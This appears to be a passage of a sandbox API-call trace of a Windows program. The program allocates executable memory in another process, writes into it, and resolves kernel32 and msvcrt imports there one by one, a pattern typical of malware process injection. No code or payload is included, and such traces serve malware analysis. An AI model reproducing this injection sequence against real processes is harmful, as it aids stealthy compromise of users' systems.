	[0240.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.142] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.142] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.142] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.143] ResetEvent (hEvent=0x680) returned 1
	[0240.143] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.143] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.143] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.143] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.143] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f290, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.144] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.144] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.144] lstrlenA (lpString="TlsGetValue") returned 11
	[0240.144] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.144] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd9e*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd9e*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0240.145] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.145] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.145] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.145] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.146] ResetEvent (hEvent=0x680) returned 1
	[0240.146] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.146] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.146] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.146] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.146] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.146] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f294, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.147] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.148] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.148] lstrlenA (lpString="UnhandledExceptionFilter") returned 24
	[0240.148] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.148] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcdac*, nSize=0x19, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcdac*, lpNumberOfBytesWritten=0x12858c*=0x19) returned 1
	[0240.148] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.148] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.148] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.149] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.149] ResetEvent (hEvent=0x680) returned 1
	[0240.149] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.149] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.150] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.150] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.150] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.150] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f298, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.150] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.151] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.151] lstrlenA (lpString="VirtualProtect") returned 14
	[0240.151] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.151] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcdc8*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcdc8*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0240.151] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.151] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.152] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.152] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.152] ResetEvent (hEvent=0x680) returned 1
	[0240.152] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.153] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.153] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.153] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.153] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.153] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f29c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.153] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.154] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.154] lstrlenA (lpString="VirtualQuery") returned 12
	[0240.154] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.154] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcdda*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcdda*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0240.154] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.154] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.154] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.155] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.155] ResetEvent (hEvent=0x680) returned 1
	[0240.155] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.155] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.155] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.156] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.156] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2a0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.156] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.156] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.156] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0240.156] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.156] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcdea*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcdea*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0240.157] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.157] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.157] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.157] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.158] ResetEvent (hEvent=0x680) returned 1
	[0240.158] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.158] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.158] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.158] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.158] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.158] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2a4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.159] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.159] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd184, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0240.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd184, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=11 | out: lpWideCharStr="msvcrt.dll") returned 11
	[0240.159] lstrlenW (lpString="msvcrt.dll") returned 10
	[0240.159] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.159] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x27c0648*, nSize=0x16, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27c0648*, lpNumberOfBytesWritten=0x12858c*=0x16) returned 1
	[0240.160] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0240.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.160] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.160] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0240.160] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0240.161] ResetEvent (hEvent=0x680) returned 1
	[0240.161] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.161] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.161] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.161] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.161] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.162] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.162] lstrlenA (lpString="__dllonexit") returned 11
	[0240.162] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.162] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce00*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce00*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0240.162] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.162] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.162] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.163] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.163] ResetEvent (hEvent=0x680) returned 1
	[0240.163] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.164] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.164] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.164] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.164] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.164] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2ac, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.164] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.165] lstrlenA (lpString="__mb_cur_max") returned 12
	[0240.165] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.165] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce0e*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce0e*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0240.165] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.165] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.165] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.166] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.166] ResetEvent (hEvent=0x680) returned 1
	[0240.166] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.225] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.225] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.225] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.225] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.225] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2b0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.226] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.226] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.226] lstrlenA (lpString="_amsg_exit") returned 10
	[0240.226] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.226] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce1e*, nSize=0xb, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce1e*, lpNumberOfBytesWritten=0x12858c*=0xb) returned 1
	[0240.227] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.227] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.227] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.227] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.228] ResetEvent (hEvent=0x680) returned 1
	[0240.228] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.228] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.228] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.228] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.228] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2b4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.229] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.229] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.229] lstrlenA (lpString="_errno") returned 6
	[0240.229] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.229] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce2c*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce2c*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.230] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.230] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.230] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.230] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.231] ResetEvent (hEvent=0x680) returned 1
	[0240.231] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
